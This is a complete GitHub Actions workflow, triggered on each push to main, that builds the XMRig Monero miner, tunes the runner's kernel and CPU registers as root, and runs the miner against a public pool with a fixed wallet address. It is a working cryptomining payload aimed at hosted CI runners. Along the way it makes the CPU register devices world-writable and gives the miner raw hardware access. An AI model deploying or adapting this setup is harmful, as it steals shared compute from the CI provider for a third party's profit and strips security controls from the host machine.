name: XMRig Mining Setup

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  xmrig-mining:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install dependencies
        run: |
          sudo apt update && sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev msr-tools fuse

      - name: Enable Huge Pages
        run: |
          echo 1280 | sudo tee /proc/sys/vm/nr_hugepages
          sudo sysctl -w vm.nr_hugepages=1280
          sudo sysctl -w vm.hugetlb_shm_group=$(id -g)

      - name: Check Huge Pages Status
        run: cat /proc/meminfo | grep Huge

      - name: Check 1GB Huge Pages Support
        run: cat /proc/cpuinfo | grep pdpe1gb || echo "1GB Huge Pages not supported"

      - name: Enable 1GB Huge Pages (If Supported)
        run: |
          echo 3 | sudo tee /proc/sys/vm/nr_hugepages
          sudo sysctl -w vm.nr_hugepages=3
        continue-on-error: true

      - name: Load MSR Module
        run: |
          sudo modprobe msr
          ls /dev/cpu/*/msr || echo "MSR access is not available"

      - name: Apply MSR Tweaks
        run: |
          sudo chmod 777 /dev/cpu/*/msr
          sudo wrmsr -a 0xc0011020 0 || echo "Failed to write MSR 0xc0011020"
          sudo wrmsr -a 0xc0011021 0x40 || echo "Failed to write MSR 0xc0011021"
          sudo wrmsr -a 0xc0011022 0x15151515 || echo "Failed to write MSR 0xc0011022"
          sudo wrmsr -a 0xc001102b 0x2000030000000000 || echo "Failed to write MSR 0xc001102b"

      - name: Give User Permissions for MSR
        run: sudo chown $(whoami) /dev/cpu/*/msr

      - name: Clone XMRig
        run: git clone https://github.com/xmrig/xmrig.git

      - name: Build XMRig
        run: |
          cd xmrig
          mkdir build && cd build
          cmake .. -DWITH_HWLOC=ON -DWITH_OPENCL=OFF -DWITH_CUDA=OFF -DCMAKE_BUILD_TYPE=Release -DXMRIG_DEPS=scripts/deps -DDONATE_LEVEL=0
          make -j$(nproc)

      - name: Grant XMRig Extra Permissions
        run: sudo setcap cap_sys_rawio,cap_dac_override+ep xmrig/build/xmrig

      - name: Run XMRig as Root
        run: |
          cd xmrig/build
          sudo ./xmrig -o pool.supportxmr.com:443 -u 44FS8hE9PRRF8fvhYms4hxi3VBsDMdztoEGieuHf9vK6FeVCQUQGCNyHCmv7NQF9UaA88MBM8YnfRJRuzdVYy1VE3MNiYpK -k --tls --donate-level=0
